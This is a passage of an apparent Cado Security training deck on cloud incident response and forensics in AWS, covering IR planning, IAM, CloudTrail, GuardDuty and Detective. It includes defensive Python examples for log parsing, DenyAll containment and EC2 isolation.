The document provides an overview of a free training program from Cado Security that covers cloud forensics and incident response fundamentals for AWS, Azure, and GCP, including topics such as digital forensics principles, investigative models, incident response planning, gathering an incident response team, running investigations, and containment and remediation. It also promotes Cado Security's incident response platform for investigating incidents at cloud speed.
6. What is Volatile Data?
Two basic types of data are collected in computer forensics:
● Persistent data: Data that is stored on a local hard drive (or another medium) and is preserved
when the computer is turned off.
● Volatile data: Data that is stored in memory, or exists in transit, and that will be lost when the
computer loses power or is turned off. Volatile data resides in registers, cache, and random
access memory (RAM). The investigation of this volatile data is called “live forensics”.
https://athenaforensics.co.uk/what-is-volatile-data/
7. What is…
● Disk Forensics
● Memory Forensics
● Network Forensics
11. Incident Response Planning - Be Prepared!
● Periodically run tabletop exercises to simulate incidents and build muscle memory across both executive and
operational teams
● Executives should be prepared to answer the following questions:
● Under what circumstances do you notify law enforcement, regulatory authorities, auditors and the
board?
● Will your organization pay a ransom? If so, how?
● If required, which outsourced incident response firm will you work with?
● If you lose access to core IT systems for an extended period of time, do you have business continuity
and disaster recovery plans in place?
● If the primary communication methods are either unavailable or compromised, do you have backup or
out-of-band communications available?
● What hours are incident responders expected to work during a high-severity incident?
● Do you have access to the data required to perform an investigation in all products and services?
12. Gather the Incident Response Team
The roles in an incident response team will vary depending on both the size of your team and the scale of the
incident. Most often, one person will take on a number of roles. A typical example of the roles in an incident
response team is:
● Leadership role - Commands the investigation and directs activities.
● Investigator role - Identifies incident root cause and the full scope of compromised systems and
data.
● Responder role - Works with internal teams and 3rd parties to recover and restore systems and
services and plan and coordinate remediation steps.
● Documentation role - Enables the investigation, remediation and potentially legal representation.
The legal representation may also be handled by inside or outside counsel (though only a small
number of incidents end up bringing in a legal representative).
13. Running an Investigation
First, identify the scope of the investigation by answering the following questions:
● Do you just need to recover services?
● Do you need to identify the root cause of the incident so it doesn’t happen again?
Most investigations start with a suspicious event, such as a malware detection on a system. The
investigation then progresses as you pivot on timestamps, key findings, and artifacts. For example:
● What other events happened just before or after the known bad event?
● Are there other suspect files in the same folder?
● Are other systems connected to known bad events or known compromised systems somehow?
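The timestamp pivot described above can be sketched in Python. This is a minimal illustration, assuming events have already been normalized into dicts with hypothetical `time` (ISO 8601) and `name` keys; real log sources need their own parsing, and the sample data is made up.

```python
from datetime import datetime, timedelta


def events_near(events, bad_event_time, window_minutes=10):
    """Return events within +/- window_minutes of a known bad event, oldest first.

    `events` is a list of dicts with hypothetical keys "time" (ISO 8601
    string) and "name"; the key names are assumptions for this sketch.
    """
    center = datetime.fromisoformat(bad_event_time)
    window = timedelta(minutes=window_minutes)
    nearby = [
        e for e in events
        if abs(datetime.fromisoformat(e["time"]) - center) <= window
    ]
    return sorted(nearby, key=lambda e: datetime.fromisoformat(e["time"]))


# Illustrative data only; not taken from a real incident.
sample_events = [
    {"time": "2023-05-01T10:20:00", "name": "new cron job created"},
    {"time": "2023-05-01T09:58:00", "name": "ssh login from unfamiliar IP"},
    {"time": "2023-05-01T10:02:00", "name": "malware detection"},
    {"time": "2023-05-01T07:00:00", "name": "routine backup"},
]

for event in events_near(sample_events, "2023-05-01T10:02:00"):
    print(event["time"], event["name"])
```

Widening `window_minutes` is the simplest way to pull in more context once the first pass has been reviewed.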
Below we provide suggested investigative steps based on the Azure service involved, the type of incident, and
recommendations on tools that may be useful.
14. Containment & Remediation
During the containment phase of an incident, some questions that will be important to answer include:
● Can you limit the damage before it gets worse?
● Do you need to isolate virtual machines or services?
● Can you permanently bring the environment back to a safe state?
● If you have identified the root cause, can you fix the original issue? If not, can you mitigate the risk
with other preventative technology or additional monitoring to identify future use?
● Have you hunted for other potential compromises? For example, by importing key systems and
scanning for malware.
● Have you reviewed the best practices above and confirmed if any need to be implemented?
● Have you enabled additional monitoring where gaps have been identified?
● Have you documented all findings and actions taken?
● Do you need to publish an incident report?
● Have you identified lessons learned and conducted a wrap-up meeting?
15. Cado Platform
Free 14-day trial
Receive unlimited access to
the Cado Platform for 14 days.
www.cadosecurity.com/free-investigation/
18. What is IaaS vs…? How is IR different?
Graphic from “IaaS vs. PaaS vs. SaaS” by RedHat
19. What is Shared Responsibility? What happens in IR?
Graphic from “Shared Responsibility Model” by AWS
20. What is Shared Fate?
Graphic from “Shared Responsibility Model” by AWS
21. What is Identity and Access Management (IAM)?
How does it impact IR? Access, Logs, Attacker Access…
22. What is Virtual Private Cloud (VPC)? How can an attacker
move?
23. What are Common Attacks in the Cloud?
● Misconfiguration
● Stolen Credentials - Where do you find them?
● Phishing - Recent examples
● Poisoned Gold Image or Library
● S3…
24. How else might you know you have a problem?
● An email from AWS...
● Weird IAM
● Sudden increase in billing
● High CPU Usage...
Graphic from “Cloud Security: Defense in Detail if Not in Depth” by SANS
34. What are…
Cloud security incident domains?
From/See “AWS Security Incident Response Guide”
https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/introduction.html
Service domain – Incidents in the service domain might affect your
AWS account, AWS Identity and Access Management (IAM)
permissions, resource metadata, billing, or other areas. A service
domain event is one that you respond to exclusively with AWS API
mechanisms, or where you have root causes associated with your
configuration or resource permissions, and might have related
service-oriented logging.
Infrastructure domain – Incidents in the infrastructure domain
include data or network-related activity, such as processes and data
on your Amazon Elastic Compute Cloud (Amazon EC2) instances…
Application domain – Incidents in the application domain occur in
the application code or in software deployed to the services or
infrastructure…
35. What is AWS IAM?
https://blog.gitguardian.com/aws-iam-security-best-practices/
AWS Identity and Access Management (IAM) is a
web service that helps you securely control
access to AWS resources.
With IAM, you can centrally manage permissions
that control which AWS resources users can
access.
You use IAM to control who is authenticated
(signed in) and authorized (has permissions) to
use resources.
36. What is the IAM workflow?
https://docs.aws.amazon.com/IAM/latest/UserGuide/intro-structure.html
https://nodramadevops.com/2019/11/why-is-aws-iam-so-hard/
The IAM workflow includes the following six elements:
- A principal is an entity that can perform actions on an AWS
resource. A user, a role or an application can be a principal.
- Authentication is the process of confirming the identity of the
principal trying to access an AWS product.
- Authorization is the process of granting or denying access to
AWS resources.
- Policies are documents that define permissions for a principal.
- A resource is an AWS entity that the principal can access.
- A request is an attempt to access an AWS resource.
37. What are Policies?
In AWS Identity and Access Management (IAM),
policies are used to define permissions for an action
regardless of the method that you use to perform the
operation. There are six types of policies that AWS
supports: identity-based policies, resource-based
policies, permissions boundaries, Organizations SCPs,
ACLs, and session policies.
Identity-based policies are the most common type of
policy and are attached to an IAM identity (user, group,
or role). Resource-based policies
are attached to a resource, such as an Amazon S3
bucket or an Amazon SQS queue.
You can create your own policies or use AWS managed
policies. AWS managed policies are created and
managed by AWS, whereas customer managed policies
are created and managed by you.
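As a rough illustration of how policy statements grant or deny a request, the sketch below evaluates a request against a list of statements. It is deliberately simplified: it assumes only identity-based policies, ignores conditions, permissions boundaries, SCPs, and resource-based policies, and uses Python's `fnmatchcase` as a stand-in for IAM wildcard matching. The function name `is_allowed` and the sample ARNs are hypothetical.

```python
from fnmatch import fnmatchcase


def _as_list(value):
    """Policy fields may hold a single string or a list of strings."""
    return value if isinstance(value, list) else [value]


def _matches(patterns, value):
    return any(fnmatchcase(value, p) for p in _as_list(patterns))


def is_allowed(statements, action, resource):
    """Simplified evaluation: explicit Deny wins, then Allow, else implicit deny."""
    allowed = False
    for stmt in statements:
        # Action names are compared case-insensitively in this sketch.
        actions = [a.lower() for a in _as_list(stmt["Action"])]
        if _matches(actions, action.lower()) and _matches(stmt["Resource"], resource):
            if stmt["Effect"] == "Deny":
                return False
            allowed = True
    return allowed


policy_statements = [
    {"Effect": "Allow", "Action": "s3:Get*", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Effect": "Deny", "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/secret/*"},
]

print(is_allowed(policy_statements, "s3:GetObject", "arn:aws:s3:::example-bucket/report.csv"))
print(is_allowed(policy_statements, "s3:GetObject", "arn:aws:s3:::example-bucket/secret/key.pem"))
print(is_allowed(policy_statements, "s3:PutObject", "arn:aws:s3:::example-bucket/report.csv"))
```

The two properties worth remembering during an investigation are that anything not explicitly allowed is denied, and that an explicit Deny overrides any Allow.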
38. How does IAM Work?
From “AWS Identity and Access Management (IAM) deep dive” by Becky Weiss @ AWS
Great talk!
39. What is Identity Federation?
“How to Establish Federated Access to Your AWS Resources by Using Active Directory User Attributes” - AWS.com
“If you already manage user identities outside of AWS, you can use IAM identity providers instead of creating IAM
users in your AWS account. With an identity provider (IdP), you can manage your user identities outside of AWS and
give these external user identities permissions to use AWS resources in your account. This is useful if your
organization already has its own identity system, such as a corporate user directory.”
40. What AWS IAM Logging is there?
https://docs.aws.amazon.com/IAM/latest/UserGuide/security-logging-and-monitoring.html
Also check out the policy simulator.
AWS CloudTrail captures all API calls for IAM and AWS STS as events, including
calls from the console and from API calls.
AWS Identity and Access Management Access Analyzer helps you identify the
resources in your organization and accounts, such as Amazon S3 buckets or IAM
roles, that are shared with an external entity. This helps you identify unintended
access to your resources and data, which is a security risk.
41. How do I block access in AWS IAM?
See “Identity & Access Management” in AWS Well-Architected Labs
https://www.wellarchitectedlabs.com/security/300_labs/300_incident_response_with_aws_console_and_cli/2_iam/
See “Incident_Response_Playbook_AWS_IAM” Jupyter Notebook for how to investigate IAM/CloudTrail
45. What Incidents might you see in AWS?
See “AWS Incident Response in your Pyjamas” (great talk!) by Paco Hope @ AWS
https://owasp.org/www-chapter-london/assets/slides/OWASPLondon-IR-In-Your-Pyjamas-Paco-Hope-20190213-PDF.pdf
50. Why is responding to incidents in the cloud hard?
Graphic from “Cloud Security: Defense in Detail if Not in Depth” by SANS
51. Steps to Responding in AWS
When you investigate a compromise of a cloud environment, there are a few key steps to follow:
1. Identify the scope of the incident: Determine which resources were affected and how the data was accessed.
2. Collect evidence: Gather log files, network traffic, metadata, and configuration files.
3. Analyze the evidence: Look for signs of malicious activity and determine how the data was compromised.
4. Respond to the incident and contain it: Take steps to mitigate the damage and prevent further incidents. For example, with a
compromised EC2 system in AWS, that may include turning off the system or updating the firewall to block all network traffic, as
well as isolating any associated IAM roles by adding a DenyAll policy. Once the incident is contained, you have more time to
investigate safely and in detail.
5. Document the incident: Create a report that describes the incident, the steps that were taken to respond to it, and the
lessons that were learned.
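The DenyAll containment step for an IAM role can be sketched as follows. The policy document uses standard IAM policy grammar; the policy name `IncidentResponseDenyAll`, the role name, and the helper name are hypothetical. Attaching the policy requires a real IAM call, for example boto3's `put_role_policy`, which is shown only in a comment so the sketch runs without AWS credentials.

```python
import json


def build_deny_all_policy():
    """Return an IAM policy document that explicitly denies every action."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "IncidentResponseDenyAll",  # hypothetical statement ID
                "Effect": "Deny",
                "Action": "*",
                "Resource": "*",
            }
        ],
    }


policy_json = json.dumps(build_deny_all_policy(), indent=2)
print(policy_json)

# Assumed usage with boto3 (not executed here):
#   iam = boto3.client("iam")
#   iam.put_role_policy(
#       RoleName="compromised-role",           # hypothetical role name
#       PolicyName="IncidentResponseDenyAll",  # hypothetical policy name
#       PolicyDocument=policy_json,
#   )
```

Because an explicit Deny overrides any Allow, this approach blocks the role without deleting it or its existing policies, which keeps them available as evidence.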
52. What data do you have in AWS?
Getting access to the data required to find the root cause is often harder in the cloud than it is on-prem,
because you are often at the mercy of the data the cloud providers have decided to let you access. That said, there are a
number of different resources that can be used for cloud forensics, including:
● AWS EC2: Data you can get includes snapshots of the volumes and memory dumps of the live systems. You can also get
CloudTrail logs associated with the instance.
● AWS EKS: Data you can get includes audit logs and control plane logs in S3. You can also get the Docker filesystem, which is
normally a versioned filesystem called overlay2, and the Docker logs from containers that have been started and
stopped.
● AWS ECS: You can use ECS Exec to grab files from the filesystem and memory (kubectl exec plays the same role on EKS).
● AWS Lambda: You can get CloudTrail logs and previous versions of the Lambda function.
53. What logging is in AWS? Where do you look?
https://cloudstudio.com.au/2022/05/14/monitoring-service-aws-azure-gcp-part1/
57. How do you respond to a compromised EC2?
If you’ve identified a potentially compromised EC2 instance, there are a number of immediate
actions you can take:
● To limit the possibility of data theft, change the security group to one that doesn’t allow any
outbound internet access.
● Identify if there was an Instance Profile attached to the EC2. If there was, check CloudTrail logs
to see if it may have been abused to access other resources in AWS.
● Take a snapshot of the EC2, to enable forensic analysis later on.
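The three immediate actions above can be sketched as one function. This is an illustration under assumptions, not a vetted playbook: `ec2` is expected to behave like a boto3 EC2 client (`describe_instances`, `modify_instance_attribute`, and `create_snapshot` are real client methods), `isolation_sg_id` is assumed to be a pre-created security group with no outbound rules, and `FakeEC2` is a hypothetical stand-in so the example runs without AWS access.

```python
def contain_instance(ec2, instance_id, isolation_sg_id):
    """Move an instance to an isolation security group and snapshot its EBS volumes.

    Returns the list of snapshot IDs that were requested.
    """
    reservations = ec2.describe_instances(InstanceIds=[instance_id])["Reservations"]
    instance = reservations[0]["Instances"][0]

    # Note the instance profile (if any) so CloudTrail can be checked for abuse.
    profile = instance.get("IamInstanceProfile", {}).get("Arn")
    print("Instance profile to review in CloudTrail:", profile)

    # Replace all security groups with the isolation group.
    ec2.modify_instance_attribute(InstanceId=instance_id, Groups=[isolation_sg_id])

    # Snapshot every attached EBS volume for later forensic analysis.
    snapshot_ids = []
    for mapping in instance.get("BlockDeviceMappings", []):
        volume_id = mapping["Ebs"]["VolumeId"]
        snap = ec2.create_snapshot(
            VolumeId=volume_id,
            Description=f"IR evidence for {instance_id} ({volume_id})",
        )
        snapshot_ids.append(snap["SnapshotId"])
    return snapshot_ids


class FakeEC2:
    """Hypothetical stand-in for a boto3 EC2 client; records calls instead of making them."""

    def __init__(self):
        self.calls = []

    def describe_instances(self, InstanceIds):
        self.calls.append(("describe_instances", InstanceIds))
        return {"Reservations": [{"Instances": [{
            "InstanceId": InstanceIds[0],
            "IamInstanceProfile": {"Arn": "arn:aws:iam::111122223333:instance-profile/example"},
            "BlockDeviceMappings": [{"DeviceName": "/dev/xvda", "Ebs": {"VolumeId": "vol-0example"}}],
        }]}]}

    def modify_instance_attribute(self, InstanceId, Groups):
        self.calls.append(("modify_instance_attribute", InstanceId, Groups))

    def create_snapshot(self, VolumeId, Description):
        self.calls.append(("create_snapshot", VolumeId))
        return {"SnapshotId": "snap-for-" + VolumeId}


fake = FakeEC2()
print(contain_instance(fake, "i-0example", "sg-0isolation"))
```

With real credentials, passing `boto3.client("ec2")` in place of `FakeEC2()` would issue the same three calls against the account.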
59. How do you perform EC2 Isolation?
See “AWS Incident Response in your Pyjamas” (great talk!) by Paco Hope @ AWS
60. Automated Incident Response and Forensics Framework
https://github.com/awslabs/aws-automated-incident-response-and-forensics/
61. Container Investigation Data Sources in AWS
Amazon S3
CloudTrail Logs
● Shows: API Level Calls
● Usefulness: Low
● Collected by: S3
EKS Audit / Control Plane Logs
● Shows: API Level Calls
● Usefulness: Medium
● Collected by: S3
Amazon EC2 - Hosting EKS/ECS
Docker Logs
● Logs what containers were started, stopped
● Usefulness: Medium
● Collected by: EC2 Import or Cado Host
Docker Container Filesystems
● Normally overlay2 versioned filesystem
● Contains all the files from all the containers
● Usefulness: High
● Collected by: EC2 EBS (API) or Cado Host (SSM/SSH)
Inside Container - EKS/ECS on Fargate/EC2
Container Filesystems
● Live filesystem as seen by the container, Memory
● Contains all the files from all the containers
● Usefulness: Very High
● Collected by: Cado Host (ECS Exec/kubectl exec)
66. Automating Response
Without Cado (8+ hours and manual, to manually respond and resolve the incident):
GuardDuty Detection Positive -> Analyst Reviews Alert -> Snapshots System -> Retrieves Snapshots for Analysis -> Process and
Investigate Snapshot -> Isolate System
With Cado (minutes and automated, to automatically respond and resolve the incident):
GuardDuty Detection Positive -> Cado Automation -> Isolate System
71. Unauthorized IAM Credential Use - Simulation and Detection
During this workshop, you will simulate the unauthorized use of IAM credentials using a script invoked within AWS
CloudShell. The script will perform reconnaissance and privilege escalation activities that have been commonly seen
by the AWS CIRT (Customer Incident Response Team) and are typically performed during similar events of this nature.
You will then be introduced to some of the tools and processes that the AWS CIRT use, and learn how to use these
tools to find evidence of unauthorized activity.
Ransomware on S3 - Simulation and Detection
During this workshop, you will use a CloudFormation template to replicate an environment with multiple IAM users and
five (5) Amazon S3 buckets. AWS CloudShell will then be used to run a bash script that will simulate data exfiltration
and data deletion events that replicate a ransomware-based security event. You will then be introduced to some of the
tools and processes that the AWS CIRT (Customer Incident Response Team) use in response to similar events,
and learn how to use these tools to find evidence of unauthorized activity.
Cryptominer Based Security Events - Simulation and Detection
During this workshop, you will simulate a cryptomining security event by using a CloudFormation template to initialize
five EC2 instances. These five EC2 instances will mimic cryptomining activity by performing DNS requests to known
cryptomining domains. You will then be introduced to some of the tools and processes that the AWS CIRT (Customer
Incident Response Team) use in response to similar events, and learn how to use these tools to find evidence of
unauthorized activity.
72. SSRF on IMDSv1 - Simulation and Detection
During this workshop, you will simulate the unauthorized use of a web application that is hosted on an AWS
EC2 instance configured to use IMDSv1 (Instance Metadata Service Version 1) and is vulnerable to SSRF
(Server Side Request Forgery). You will then walk through some of the detection activities that the AWS CIRT
(Customer Incident Response Team) perform when responding to security events of this nature.
AWS CIRT Toolkit For Incident Response Preparedness
During this workshop, you will install and experiment with some common tools and utilities that the AWS CIRT
(Customer Incident Response Team) use on a daily basis. The AWS CIRT uses these tools to detect security
misconfigurations, respond to active events, and assist customers with protecting their infrastructure.
(Mostly Athena…)
73. Threat Detection and Response with Amazon GuardDuty and Amazon Detective
https://catalog.workshops.aws/guardduty/en-US/0-workshop-introduction#threat-detection-and-response-scenarios
74. Well Architected Labs: Incident Response
https://www.wellarchitectedlabs.com/security/quests/quest_200_incident_response_day/
(Official AWS Site)
83. What is CloudTrail?
https://docs.aws.amazon.com/IAM/latest/UserGuide/security-logging-and-monitoring.html
AWS CloudTrail is a service that enables you to log, continuously monitor, and retain account
activity related to actions across your AWS infrastructure.
You can use CloudTrail to identify who or what took which action, what resources were acted upon, when the event
occurred, and other details to help you analyze and respond to activity in your AWS account.
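To make the "who took which action, on what, and when" idea concrete, the sketch below reduces a CloudTrail record to those fields. The field names (`eventTime`, `eventSource`, `eventName`, `sourceIPAddress`, `userIdentity`, `errorCode`) are standard CloudTrail record fields; the sample record values and the helper name `summarize_record` are made up for illustration.

```python
import json


def summarize_record(record):
    """Reduce one CloudTrail record to who / what / when / where."""
    identity = record.get("userIdentity", {})
    return {
        "when": record.get("eventTime"),
        "who": identity.get("arn") or identity.get("type"),
        "what": f'{record.get("eventSource")}:{record.get("eventName")}',
        "from_ip": record.get("sourceIPAddress"),
        "error": record.get("errorCode"),  # absent when the call succeeded
    }


# Illustrative record; values are invented for the example.
sample_log = json.loads("""
{"Records": [{
  "eventTime": "2023-05-01T10:02:00Z",
  "eventSource": "iam.amazonaws.com",
  "eventName": "AttachRolePolicy",
  "awsRegion": "us-east-1",
  "sourceIPAddress": "203.0.113.10",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/example"},
  "requestParameters": {"roleName": "example-role"}
}]}
""")

for rec in sample_log["Records"]:
    print(summarize_record(rec))
```

A flat summary like this is easy to sort by time or group by identity when building an incident timeline.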
86. What is CloudWatch?
https://docs.aws.amazon.com/IAM/latest/UserGuide/security-logging-and-monitoring.html
Amazon CloudWatch monitors your AWS resources and the applications that you
run on AWS in real time. You can collect and track metrics, create customized
dashboards, and set alarms that notify you or take actions when a specified metric
reaches a threshold that you specify. For example, you can have CloudWatch track
CPU usage or other metrics of your Amazon EC2 instances and automatically
launch new instances when needed.
Amazon CloudWatch Logs helps you monitor, store, and access your log files
from Amazon EC2 instances, CloudTrail, and other sources. CloudWatch Logs can
monitor information in the log files and notify you when certain thresholds are met.
You can also archive your log data in highly durable storage.
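As a sketch of the alarm-on-threshold idea, the function below builds the parameters for a CPU alarm on a single EC2 instance. The parameter names match boto3's CloudWatch `put_metric_alarm` call; the alarm naming scheme, the 90% threshold, and the two five-minute periods are assumptions chosen for illustration, and the actual API call appears only in a comment.

```python
def cpu_alarm_params(instance_id, threshold_percent=90.0):
    """Build keyword arguments for a CloudWatch CPU alarm on one EC2 instance."""
    return {
        "AlarmName": f"high-cpu-{instance_id}",  # hypothetical naming scheme
        "Namespace": "AWS/EC2",
        "MetricName": "CPUUtilization",
        "Dimensions": [{"Name": "InstanceId", "Value": instance_id}],
        "Statistic": "Average",
        "Period": 300,           # seconds per datapoint
        "EvaluationPeriods": 2,  # consecutive periods that must breach
        "Threshold": threshold_percent,
        "ComparisonOperator": "GreaterThanThreshold",
    }


params = cpu_alarm_params("i-0example")
print(params)

# Assumed usage with boto3 (not executed here):
#   boto3.client("cloudwatch").put_metric_alarm(**params)
```

Sustained high CPU is one of the warning signs listed earlier in the deck, so an alarm like this can double as a coarse cryptomining tripwire.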
87. CloudWatch vs CloudTrail?
CloudWatch
● Performance Monitoring
● Log events across AWS Services - operations
● Higher Level Monitoring
CloudTrail
● Auditing
● Log API activity across AWS Services - Activities
● Lower Level Granular Data
88. Lambda Logging in CloudWatch
https://docs.aws.amazon.com/lambda/latest/operatorguide/log-structure.html
89. Lambda Logging in CloudWatch
https://docs.aws.amazon.com/lambda/latest/operatorguide/parse-logs.html
90. Collecting operating system logs with the CloudWatch agent
https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/Install-CloudWatch-Agent.html
91. So Many Logs, So Little Standards?
See “AWS Logging Types”
https://bit.ly/3XidVm3
102. What is GuardDuty?
https://aws.amazon.com/guardduty/
Amazon GuardDuty is a threat detection service that continuously monitors
your AWS accounts and workloads for malicious activity and delivers
detailed security findings for visibility and remediation. GuardDuty uses
machine learning, anomaly detection, and threat intelligence to identify and
prioritize potential threats.
GuardDuty can detect a wide range of threats, including:
● Compromised accounts
● Anomalous behavior
● Malware
● Data exfiltration
● Infrastructure changes
● Network intrusions
103. How does EBS scanning work?
https://aws.amazon.com/guardduty/
104. What are common GuardDuty Detections?
https://docs.aws.amazon.com/guardduty/latest/ug/logging-using-cloudtrail.html
AWS CloudTrail management events that GuardDuty monitors:
- Configuring security (IAM AttachRolePolicy API operations)
- Configuring rules for routing data (Amazon EC2 CreateSubnet API operations)
- Setting up logging (AWS CloudTrail CreateTrail API operations)
AWS CloudTrail data events that GuardDuty monitors:
Data events, also known as data plane operations, provide insight into the resource operations performed on or within a resource. They are often
high-volume activities. For example:
- GetObject API operations
- PutObject API operations
- ListObjects API operations
- DeleteObject API operations
Kubernetes audit logs
Amazon EKS allows Kubernetes audit logs to be ingested as Amazon CloudWatch Logs through the EKS control plane logging feature.
VPC Flow Logs
The VPC Flow Logs feature of Amazon VPC captures information about the IP traffic going to and from network interfaces within your environment.
When you enable GuardDuty, it immediately starts analyzing your VPC flow logs data.
DNS logs
If you use AWS DNS resolvers for your Amazon EC2 instances (the default setting), then GuardDuty can access and process your request and
response DNS logs through the internal AWS DNS resolvers.
Elastic Block Store (EBS) volume
GuardDuty Malware Protection scans and detects malware on Amazon EBS volumes attached to your Amazon EC2 instances.
RDS login activity monitoring
RDS login activity captures both successful and failed login attempts made to the supported Amazon Aurora databases in your AWS environment.
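Of the data sources above, VPC Flow Logs are the easiest to inspect by hand. The sketch below parses records in the default (version 2) flow log format and totals accepted bytes per destination, which is one rough way to look for unusual outbound transfers. The field order follows the default format; the helper names and sample records are illustrative assumptions, and custom log formats would need a different field list.

```python
FLOW_LOG_FIELDS = [
    "version", "account_id", "interface_id", "srcaddr", "dstaddr",
    "srcport", "dstport", "protocol", "packets", "bytes",
    "start", "end", "action", "log_status",
]


def parse_flow_log_line(line):
    """Parse one space-separated flow log record in the default (version 2) format."""
    values = line.split()
    if len(values) != len(FLOW_LOG_FIELDS):
        raise ValueError(f"expected {len(FLOW_LOG_FIELDS)} fields, got {len(values)}")
    return dict(zip(FLOW_LOG_FIELDS, values))


def bytes_by_destination(lines):
    """Total accepted bytes per destination address, largest first."""
    totals = {}
    for line in lines:
        rec = parse_flow_log_line(line)
        # Records with no data carry "-" placeholders, so skip non-numeric byte counts.
        if rec["action"] == "ACCEPT" and rec["bytes"].isdigit():
            totals[rec["dstaddr"]] = totals.get(rec["dstaddr"], 0) + int(rec["bytes"])
    return sorted(totals.items(), key=lambda item: item[1], reverse=True)


# Illustrative records using documentation IP ranges.
sample_lines = [
    "2 111122223333 eni-0example 10.0.1.5 198.51.100.7 49152 443 6 20 4000 1683000000 1683000060 ACCEPT OK",
    "2 111122223333 eni-0example 10.0.1.5 198.51.100.7 49153 443 6 90 900000 1683000060 1683000120 ACCEPT OK",
    "2 111122223333 eni-0example 203.0.113.9 10.0.1.5 40000 22 6 3 180 1683000000 1683000060 REJECT OK",
]
print(bytes_by_destination(sample_lines))
```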
105. What are common GuardDuty Findings?
https://aws.amazon.com/blogs/aws/new-using-amazon-guardduty-to-protect-your-s3-buckets/
106. What Threat Intelligence is in GuardDuty?
https://maturitymodel.security.aws.dev/en/4.-optimized/threat-intellingence/
107. Where does GuardDuty log?
https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_exportfindings.html
GuardDuty supports exporting active findings to CloudWatch Events and, optionally, to an Amazon S3 bucket.
New Active findings that GuardDuty generates are automatically exported within about 5 minutes after the finding is generated.
You can set the frequency for how often updates to Active findings are exported to CloudWatch Events.
The frequency that you select applies to the exporting of new occurrences of existing findings to CloudWatch Events, your S3
bucket (if configured), and Detective (if integrated).
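Once findings have been exported, a first triage pass can be scripted. The sketch below assumes one JSON finding per line with `id`, `type`, and numeric `severity` fields, as in exported findings. The severity bands used here (Low below 4, Medium from 4 up to 7, High at 7 and above) are a coarse assumption for this sketch, so check them against the current GuardDuty documentation. The sample findings and their severity values are invented.

```python
import json

SEVERITY_ORDER = {"Low": 0, "Medium": 1, "High": 2}


def severity_label(score):
    """Map a numeric severity to a coarse label (bands are an assumption, see above)."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


def triage(json_lines, minimum="Medium"):
    """Return (label, type, id) for findings at or above `minimum`, most severe first."""
    picked = []
    for line in json_lines:
        if not line.strip():
            continue
        finding = json.loads(line)
        label = severity_label(float(finding["severity"]))
        if SEVERITY_ORDER[label] >= SEVERITY_ORDER[minimum]:
            picked.append((label, finding["type"], finding["id"]))
    return sorted(picked, key=lambda item: SEVERITY_ORDER[item[0]], reverse=True)


# Illustrative export lines; IDs and severity values are made up.
sample_export = [
    '{"id": "f-1", "type": "Recon:EC2/PortProbeUnprotectedPort", "severity": 2}',
    '{"id": "f-2", "type": "CryptoCurrency:EC2/BitcoinTool.B!DNS", "severity": 8}',
    '{"id": "f-3", "type": "UnauthorizedAccess:EC2/SSHBruteForce", "severity": 5}',
]

for row in triage(sample_export):
    print(row)
```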
108. Where does GuardDuty log?
Amazon GuardDuty can export findings to an Amazon S3 bucket or CloudWatch.
To export findings to an Amazon S3 bucket:
1. Go to the Amazon GuardDuty console.
2. In the navigation pane, choose Settings.
3. Under Findings export options, choose Configure now.
4. For S3 bucket, choose Existing bucket and select the bucket that you want to use.
5. For Log file prefix, enter a prefix for the log files.
6. Choose Save.
To export findings to a CloudWatch Logs log group:
1. Go to the Amazon GuardDuty console.
2. In the navigation pane, choose Settings.
3. Under Findings export options, choose Configure now.
4. For CloudWatch Logs log group, choose Existing log group and select the log group that
you want to use.
5. Choose Save.
Once you have configured findings export, GuardDuty will begin exporting findings to the destination
that you selected.
113. What is Amazon Detective?
Amazon Detective is a security service that helps you investigate security incidents
across multiple AWS accounts. Detective automatically collects and stores security
telemetry from your AWS accounts, including CloudTrail logs, VPC Flow Logs, and
GuardDuty findings. It then uses machine learning to identify anomalous behavior and to
build a security behavior graph that represents the interactions between your AWS
resources.
Detective can help you to:
● Quickly identify the root cause of security incidents
● Investigate security incidents across multiple AWS accounts
● Get a comprehensive view of your security posture
● Remediate security incidents more quickly
Detective is a powerful tool that can help you to improve your security posture and to
protect your AWS environment from threats.
114. What are Example Use Cases?
https://pages.awscloud.com/rs/112-TZM-766/images/2020_0122-SID_Slide-Deck.pdf
115. What are Investigation Playbooks?
https://maturitymodel.security.aws.dev/en/4.-optimized/detective/
116. How do you Search?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
117. How do you review a GuardDuty Finding?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
118. How do you review Connections?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
119. How do you analyze detailed VPC Flow Logs?
https://aws.amazon.com/blogs/security/investigate-vpc-flow-with-amazon-detective/
120. How do you use GeoIP?
https://aws.amazon.com/blogs/aws/amazon-detective-rapid-security-investigation-and-analysis/
123. What is AWS Security Hub?
https://aws.amazon.com/security-hub/
AWS Security Hub is a centralized security management service that provides you
with a comprehensive view of your security posture across your AWS accounts. It
does this by aggregating security alerts (i.e. findings) from various AWS services and
partner products in a standardized format so that you can more easily take action on
them. Security Hub also provides you with a set of pre-defined security checks that
you can use to assess your compliance with industry standards and best practices.
It provides:
● Reduced complexity: Security Hub simplifies security management by
providing you with a single place to view and manage security alerts from
across your AWS accounts.
● Improved visibility: Security Hub provides you with a comprehensive view of
your security posture across your AWS accounts. This information can help
you to identify and remediate security vulnerabilities before they are exploited.
● Increased compliance: Security Hub can help you to meet your compliance
requirements by providing you with a centralized view of your security events.
This information can be used to demonstrate your compliance with industry
standards, such as HIPAA and PCI DSS.
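Because Security Hub normalizes findings into one format, a few lines of code can summarize findings from many products at once. The sketch below assumes findings shaped like the AWS Security Finding Format, using only the `Severity.Label` and `Resources[].Id` fields; the helper names and sample findings are hypothetical.

```python
from collections import Counter


def count_by_severity(findings):
    """Count findings per Severity.Label."""
    return Counter(f.get("Severity", {}).get("Label", "UNKNOWN") for f in findings)


def resources_with_label(findings, label):
    """Return the sorted resource IDs that have at least one finding with this label."""
    ids = set()
    for f in findings:
        if f.get("Severity", {}).get("Label") == label:
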